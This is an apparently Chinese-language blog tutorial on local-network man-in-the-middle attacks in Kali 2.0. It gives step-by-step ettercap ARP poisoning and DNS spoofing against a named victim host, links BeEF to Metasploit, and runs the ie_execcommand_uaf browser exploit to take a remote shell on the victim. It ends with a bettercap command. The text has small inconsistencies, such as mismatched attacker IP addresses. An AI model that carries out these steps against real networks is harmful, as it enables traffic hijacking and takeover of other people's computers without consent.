美文网首页
kali 2.0下的中间人攻击

kali 2.0下的中间人攻击

作者: 托风说话 | 来源:发表于2017-12-27 23:34 被阅读0次
    kali 2.0下的中间人攻击

    前言,提起中间人攻击,首先我们会想到老牌的ettercap,今天我们来介绍几种内网中间人攻击的工具

      ettercap,bettercap,mitmf(当然还需要beef和metasploit配合,效果更佳)

      0x01 ettercap

      ettercap是LINUX下一个强大的 欺骗工具,当然WINDOWS也能用,你能够用飞一般的速度创建和发送伪造的包.让你发送从网络适配器到应用软件各种级别的包.绑定监听数据到一个本地端口:从一个客户端连接到这个端口并且能够为不知道的协议解码或者把数据插进去(只有在arp为基础模式里才能用)

      metasploit配合beef+ettercap局域网dns劫持拿shell

      所用工具:metasploit beef ettercap

      首先我们通过

      ettercap -G 打开我们的ettercap工具

    kali 2.0下的中间人攻击

    指定网卡 Sniff -> Unified sniffing -> Ok

    然后通过 Hosts->Scan for hosts 扫描一下局域网的机器,通过 Hosts->Hosts list 显示出来,如图

    其中 192.168.2.1为网关,192.168.2.105为受害机器

      我们选中192.168.2.105 Add to Target 1

      选中网关 192.168.2.1 Add to Target 2

      如图

    选中 Mitm -> Arp poisoning -> 勾选Sniff remote connections 点ok 如图

    选中 Plugins -> Manage the Plugins -> 双击 dns_spoof

    这样我们就完成了受害机器的dns劫持过程,我们修改一下

      vim /etc/ettercap/etter.dns

    使其无论打开什么网址,其实打开的都是 192.168.1.104 ok 一切准备就绪,我们开始运行ettercap 如图:

    好了,我们在受害机器了ping一下,看看是否劫持成功

    没有问题,所有的网址都没劫持到192.168.2.104上

      接下来,我们使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell

      刚开始的时候,需要beef和metasploit关联一下

      我们配置一下

      vim /usr/share/beef-xss/config.yaml

    开启metasploit 拓展

      然后配置一下拓展下的metasploit配置文件

      vim /usr/share/beef-xss/extensions/metasploit/config.yaml

    把ip填写成攻击机器的ip,把metasploit路径填上,保存.

      这就完成了beef和metasploit的关联

      然后把metasploit的服务开启,

      由于使用PostgreSQL作为数据库,因此,必须先运行它。

      root@kali:~# service postgresql start

      启动Metasploit服务

      root@kali:~# service metasploit start

      在命令行下用msfconsole把控制台打开,接着加载beEF。所用命令为:“load msgrpc ServerHost=192.168.2.104 Pass=abc123”

    下面我们来启动beef

      cd /usr/share/beef-xss/ ./beef -x

      我们看到 metasploit 已经加载进来了

    我们通过 http://192.168.2.104:3000/ui/panel 打开beef界面,用户名和密码都是beef

    好了,现在一切都已经准备好,让我们用php编写一个程序,去搞shell吧

      vim /var/www/index.php

      我们再进入msf

      use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.2.104 set URIPATH / exploit

      这样就完成了监听,一旦目标机器打开网站

    给他一个跳转,让它跳转到 http://192.168.2.104:8080

      看一眼我们的metaspolt 已经拿到了

    使用sessions -i id号 控制目标机器

      好了 最后一张图 完结 累死

    0x02 bettercap

      bBetterCap是一个功能强大、模块化、轻便的MiTM框架,可以用来对网络开展各种类型的中间人攻击(Man-In-The-Middle)。它也可以帮你实时地操作HTTP和HTTPS流量,以及其他更多功能。

      bettercap -I eth0 -X

    相关文章

      网友评论

          本文标题:kali 2.0下的中间人攻击

          本文链接:https://www.haomeiwen.com/subject/ahopgxtx.html